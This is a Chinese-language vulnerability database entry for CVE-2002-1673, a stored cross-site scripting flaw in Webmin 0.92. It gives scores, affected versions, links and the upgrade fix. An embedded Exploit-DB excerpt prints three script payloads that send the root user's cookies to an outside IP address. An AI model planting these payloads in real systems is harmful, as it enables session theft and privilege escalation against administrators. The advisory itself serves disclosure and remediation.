CVE-2002-1673
CVSS3.6
发布时间 :2002-12-31 00:00:00
修订时间 :2008-09-05 16:31:13
NMCOE    

[原文]The web interface for Webmin 0.92 does not properly quote or filter script code in files that are displayed to the interface, which allows local users to execute script and possibly steal cookies by inserting the script into certain files or fields, such as a real user name entry in the passwd file.


[CNNVD]Webmin脚本代码输入验证漏洞(CNNVD-200212-191)

        
        Webmin是一款基于WEB接口的Unix和Linux操作系统管理程序。
        Webmin对显示在WEB接口的输出没有很好过滤脚本代码,可导致恶意脚本代码被执行。
        Webmin对一些系统文件等输出显示到WEB接口缺少充分的过滤,可以攻击者更改这些文件内容,当ROOT用户浏览时被执行,另外,攻击者也可以在其他类型输出里插入恶意Javascript代码,当ROOT用户浏览此链接的时候,导致脚本代码在ROOT用户浏览器上执行,泄露基于COOKIE认证的敏感信息。
        

- CVSS (基础分值)

CVSS分值: 3.6 [轻微(LOW)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: NONE [对系统可用性无影响]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:webmin:webmin:0.85
cpe:/a:webmin:webmin:0.42
cpe:/a:webmin:webmin:0.51
cpe:/a:webmin:webmin:0.77
cpe:/a:webmin:webmin:0.7
cpe:/a:webmin:webmin:0.41
cpe:/a:webmin:webmin:0.2
cpe:/a:webmin:webmin:0.1
cpe:/a:webmin:webmin:0.6
cpe:/a:webmin:webmin:0.80
cpe:/a:webmin:webmin:0.83
cpe:/a:webmin:webmin:0.92
cpe:/a:webmin:webmin:0.22
cpe:/a:webmin:webmin:0.4
cpe:/a:webmin:webmin:0.92.1
cpe:/a:webmin:webmin:0.76
cpe:/a:webmin:webmin:0.91
cpe:/a:webmin:webmin:0.31
cpe:/a:webmin:webmin:0.78
cpe:/a:webmin:webmin:0.84
cpe:/a:webmin:webmin:0.3
cpe:/a:webmin:webmin:0.88
cpe:/a:webmin:webmin:0.5
cpe:/a:webmin:webmin:0.79
cpe:/a:webmin:webmin:0.21

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1673
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-1673
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200212-191
(官方数据源) CNNVD

- 其它链接及资源

http://xforce.iss.net/xforce/xfdb/8596
(PATCH)  XF  webmin-functions-execute-code(8596)
http://www.securityfocus.com/bid/4329
(PATCH)  BID  4329

- 漏洞信息

Webmin脚本代码输入验证漏洞
低危 输入验证
2002-12-31 00:00:00 2005-10-20 00:00:00
本地  
        
        Webmin是一款基于WEB接口的Unix和Linux操作系统管理程序。
        Webmin对显示在WEB接口的输出没有很好过滤脚本代码,可导致恶意脚本代码被执行。
        Webmin对一些系统文件等输出显示到WEB接口缺少充分的过滤,可以攻击者更改这些文件内容,当ROOT用户浏览时被执行,另外,攻击者也可以在其他类型输出里插入恶意Javascript代码,当ROOT用户浏览此链接的时候,导致脚本代码在ROOT用户浏览器上执行,泄露基于COOKIE认证的敏感信息。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * 在漏洞修补之前不要浏览日志。
        厂商补丁:
        Webmin
        ------
        目前厂商已经在新版的软件中修复了这个安全问题,请到厂商的主页下载:
        
        http://www.webmin.com/download/webmin-0.93.tar.gz

- 漏洞信息 (21348)

Webmin 0.x Script Code Input Validation Vulnerability (EDBID:21348)
linux local
2002-03-20 Verified
0 prophecy
N/A [点击下载]
source: http://www.securityfocus.com/bid/4329/info

Webmin is a web-based interface for system administration of Unix and Linux operating systems.

Webmin does not filter script code from output that may be displayed by the web interface, such as log files, etc. This may enable a local attacker, with write privileges to such files, to cause arbitrary script code to be executed by the root user. Additionally, an attacker who can contrive a way to inject malicious script code into other types of output displayed by the Webmin interface may also exploit this issue.

This may enable the attacker to steal cookie-based authentication credentials from the root user, eventually resulting in an escalation of privileges for the local attacker. 

Insert the following line into the virtusers file, and wait for the root
user to visit that page:
</tt></a></td><tt><td><script>/* */document.write('<img
src="http://192.168.40.1/'+document.cookie+'">');</script>

Or the following into the /etc/aliases file:
</a></td><td><tt><script>zz=unescape("%20");document.write('<img'/*:
*/+zz+'src="http://10.1.1.33/'+document.cookie+'">');</script>

Potentially more likely to be exploited however, would be a malicious
local user who has _no_ access to webmin, who could change a file that
webmin views through the HTML
interface (where the code being read in is not checked for HTML). An
example would be changing their
'real name' in /etc/passwd to be something along the lines of:
<script>zz=unescape("%3A");document.write('<img
src="http'+zz+'//10.1.1.33/'+document.cookie+'">');</script>
(Although chfn doesn't let you specify a username this long, but you get
the idea.)

		

- 漏洞信息

20873
Webmin Interface File Display Content XSS
Remote / Network Access Input Manipulation
Loss of Integrity Upgrade
Exploit Public Vendor Verified

- 漏洞描述

- 时间线

2002-03-06 Unknow
2002-03-06 2002-03-06

- 解决方案

Upgrade to version 0.93 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站